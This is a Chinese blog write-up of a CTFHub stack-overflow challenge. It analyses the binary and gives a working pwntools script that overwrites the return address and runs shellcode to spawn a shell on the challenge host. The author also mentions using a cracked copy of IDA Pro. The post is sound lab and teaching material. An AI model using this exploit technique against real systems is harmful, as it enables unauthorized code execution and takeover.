ret2shellcode

已于 2022-07-20 21:40:55 修改
阅读量477 收藏 2
点赞数
分类专栏: 菜狗子pwn 文章标签: linux 运维 服务器 pwn
于 2022-07-20 17:56:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56301399/article/details/125895537
版权

文章目录

一、栈溢出?

在栈溢出的攻击技术中通常是要控制函数的返回地址到特定位置执行自己想要执行的代码。

二、解题过程

1.开启题目,下载附件,使用file查看文件类型

在这里插入图片描述查看安全措施 CANARY/FORTIFY/NX/PIE 基本都关闭了
在这里插入图片描述

是一个64位的elf文件,添加可执行权限
在这里插入图片描述
运行一下看看,可以看到题目生成一个地址,并且需要在Input someting 后面输入payload

在这里插入图片描述

2.IDA反编译

(ps:IDA在linux环境中太难配置了,我的方法是在windows环境下,开一台虚拟机,然后在windows里下载破解版ida pro,在linux虚拟机里做题)
老规矩,放到IDA里看一下:
在这里插入图片描述在这里插入图片描述
__int64 buf; // [rsp+0h] [rbp-10h] 可以知道buf相对于rbp的偏移为0x10
所以其可用的shellcode空间为16+8=24字节(偏移量+返回地址),我们有长度为23的shellcode,但是因为其本身是有push指令的,如果我们把shellcode放在返回地址的前面,在程序leave的时候会破坏shellcode,所以我们将其放在后面,即payload的格式为:

bytes('a',encoding="utf8")*24+[buf_addr+32]+shellcode

这里的32是24字节的填充数据+返回地址

3.代码

from pwn import *

context(os="linux", arch="amd64", log_level='debug')
host = 'challenge-b5fd6fdf00912e7a.sandbox.ctfhub.com'
port = 33363

p = process('./pwn')
p = connect(host,port)
p.recvuntil(b'[')
buf_addr = int(p.recvuntil(b']')[:-1].decode('utf-8'), 16) # 获取buf地址
shellcode_address = buf_addr+0x20
p.recv() 
shell= asm(shellcraft.sh())
p.sendline( b'a'*24 + p64(shellcode_address) + shell)
p.interactive()

在这里插入图片描述

总结

基本流程是先查看文件信息,然后ida反编译,再去寻找自己所要的变量,最后构建代码。

长街395
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 782
CTF-wiki的注解:ret2shellcode
栈溢出入门(ret2shellcode漏洞)
最新发布
2301_80718478的博客
07-05 504
ret2shellcode,即控制程序执行 shellcode代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码,然后通过利用,让程序调到shellcode的地址后去执行这里为了学习shellcode漏洞,龙哥更新了源码:这里是依次获取两个字符串并输出。
Ret2ShellCode
钞sir的博客
01-24 8187
红颜祸 千般柔情 相思难解两相若 蝶恋花 几经浮沉 枯骨终是化飞沙 简介 ret2shellcode顾名思义,就是return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcode,得到system(sh)的效果;ret2shellcode是栈溢出中一种简单而且常规的操作,当配合ROP等技术的使用后,非常有用 利用条件 ret2shel...
CTFhub-pwn-[ret2shellcode]
m0_43405474的博客
08-26 1402
CTF中pwn的一个关于ret2shellcode的小练习,来自CTFhub。
ret2libc exploit
07-07
ret2libc攻击的核心思想在于利用库函数(通常来自libc库)而不是自定义的shellcode。这是因为libc库中的函数本身是可执行的,并且通常拥有足够的权限来执行危险的操作。通过将返回地址指向libc中的某个函数,攻击者...
Performing a ret2libc Attack-InVoLuNTaRy
04-24
**ret2libc**(返回到libc或返回到C库)是一种攻击技术,它允许攻击者在无需注入shellcode的情况下控制目标系统中的易受攻击进程。这种攻击方式特别适用于那些具有非可执行堆栈的系统,这类系统的防御机制通常会阻止...
Lab2-Return-To-Libc
11-10
Return-to-libc攻击是缓冲区溢出攻击的一种变种,它不依赖于执行已知的shellcode,而是利用程序库函数(如libc)中的现有代码来执行攻击者想要的操作。这种方法的优势在于,即使在DEP开启的情况下,由于系统函数通常...
shellcode简单例子
10-28
2. **构造溢出数据**:构造一段包含shellcode的数据,并填充到足够的长度以覆盖返回地址。 3. **触发漏洞**:通过某种方式触发漏洞,使得程序跳转到shellcode所在的地址。 4. **执行shellcode**:shellcode被加载到...
Delphi编写ShellCode的示例
02-22
$C3, // ret // ShellCode Args $43, $6d, $64, $2e, $65, $78, $65, $00, // "cmd.exe" $00, $00, $00, $00, $00, $00, $00, $00, // null-terminated $00, $00, $00, $00, $00, $00, $00, $00, // empty ...
pwn ret2shellcode
小龙在线
09-12 425
ret2shellcode适用前提 不存在system等危险函数,注入shellcode 查看文件格式 查看CPU架构和安全机制 查看溢出漏洞位置 IDA打开ret2shellcode,搜索危险函数,不存在: main函数里,F5反编译,找到溢出点:gets 同时也能计算出EBP的偏移:0x1c + 0x64 = 查看EBP偏移: gdb ret2shellcode cyclic 200 r # 200个字符 cyclic -l caab 32位程序的EBP宽度是4个字节。 所以到EIP的偏移是
ctfhubret2shellcode
m0_75234353的博客
04-02 386
要把shellcode写入返回地址之后,所以shellcode地址为16+8+8=32。还要再覆盖上父函数的栈底的指针信息,因为是64架构,所以有8字节。发现stack的权限有rwx,本题的攻破点就在栈上了。由图可得:buf距rbp 0x10,也就是16个字节。连接成功,即可得flag。
Rop-Ret2Shellcode-64位实例
fanghuapyk的博客
03-19 836
Rop-Ret2Shellcode-64位实例 前面写过了32位的shellcode,这次继续64位shellcode,当我们的64位程序中没有system函数,并且开启了NX保护时,这时我们需要用到64位shellcode来执行execve(“/bin/sh”,null,null); 如何编写shellcode呢? ①想办法调用execve("/binsh" , null, null); ②借助栈来传入字符串/bin/sh ③系统调用execve rax = 0x3b(64bit) rdi = bin_
好好说话之ret2shellcode
hollk’s blog
06-22 1734
本题为ret2shellcode-example 题目路径 /ctf-challenges/pwn/stackoverflow/ret2shellcode/ret2shellcode-example 一、原理 ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shell...
PWN --- ret2shellcode
qq_41696518的博客
06-28 880
PWN ret2shellcode
CTFHUB-PWN-ret2shellcode
m0_64180167的博客
04-16 899
几个大方向的思路:没有PIE:ret2libcNX关闭:ret2shellcode其他思路:ret2csu、ret2text 【程序本身有先检查开了什么保护没有开保护 并且是64 的放入ida64查看字符串发现没有shell我们看看主函数发现有read函数 但是没有shell我们现在要确定一些信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

长街395

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值